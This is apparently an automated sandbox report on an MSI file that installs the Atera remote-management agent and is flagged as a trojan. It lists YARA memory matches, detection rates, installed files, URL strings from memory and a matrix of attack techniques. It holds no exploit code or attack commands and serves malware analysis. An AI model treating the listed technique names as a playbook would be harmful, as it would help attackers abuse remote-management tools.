                                Source: Yara matchFile source: 0000000E.00000002.1447005900.000001E726B10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2040710352.000002E723305000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2140198876.000001A880FE0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2120854347.000001CC2B48B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2170525081.00000270550EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261D5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2148582502.000001A881320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1582681527.000001FD41971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000003.2259779386.000001DCFCE9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2464450216.000001327BD8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1812597098.0000022AC03B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1608506296.000001A113D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1581326542.000001FD410F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2375885446.0000010B6E6F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2170525081.00000270550E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.000001326278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1446510712.000001E7267D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234007AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400398000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB895000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B5D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1609162164.000001A113FB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.1709494324.00000218AF010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2149932355.000001E433220000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000003.2110342864.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1919102536.0000023476820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916873070.00000234765C0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2170525081.00000270550A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2557866082.000000C469EF0000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2040710352.000002E723288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1582267189.0000026AD1E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2170525081.000002705512C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2266637366.000002706E120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2394795109.0000010B6E970000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1850146314.00000246BACCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1869079439.00000246D3EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2133420336.000002139A89B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1876075964.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E7285D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1581326542.000001FD410B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2120854347.000001CC2B454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000003.1634606587.000001E04A4E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.000002340063A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2141115637.000001A88111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1581307208.0000026AD1C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1446510712.000001E72681A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1581307208.0000026AD1C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2115523324.0000016597C40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2107478739.000001659792C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000000.1996426946.000001CC122B2000.00000002.00000001.01000000.0000002C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2375885446.0000010B6E73C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E433A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1608506296.000001A113D69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1811600613.0000022AC01C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2374062849.0000010B6E6BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2040710352.000002E723280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2561414784.0000024844DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2110707881.000001F140E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E728552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1812887385.0000022AC0862000.00000002.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2079198013.000001CC1254D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.0000023476656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1595672822.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1585649904.000001FD5A0F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B4ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1609284413.000001A1145B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Code function: 37_2_00007FFB02EFB9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,37_2_00007FFB02EFB9F0
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | 1 Replication Through Removable Media | 641 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 32 Windows Service | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 32 Windows Service | 111 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 1 Software Packing | NTDS | 275 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 11 Service Execution | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 781 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 11 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 123 Masquerading | Proc Filesystem | 371 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 371 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 111 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Rundll32 | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
                                [Behavior graph] Behavior Graph ID: 1524137, Sample: TRABALHO----PROCESSO0014S55..., Startdate: 02/10/2024, Architecture: WINDOWS, Score: 100

                                Source | Detection | Scanner | Label | Link
                                TRABALHO----PROCESSO0014S55-S440000000S1.msi | 24% | ReversingLabs | Win32.Trojan.Atera |

                                Source | Detection | Scanner | Label | Link
                                4c9995.rbf (copy) | 26% | ReversingLabs | Win32.Trojan.Atera |
                                4c9997.rbf (copy) | 0% | ReversingLabs | |
                                4c9998.rbf (copy) | 0% | ReversingLabs | |
                                4c9999.rbf (copy) | 0% | ReversingLabs | |
                                4c999a.rbf (copy) | 0% | ReversingLabs | |
                                4c999b.rbf (copy) | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | 26% | ReversingLabs | Win32.Trojan.Atera |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.DiagnosticSource.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Encodings.Web.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll | 0% | ReversingLabs | |
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll | 0% | ReversingLabs | |
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
                                No contacted domains info
                                                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templatesAgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpfalse
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 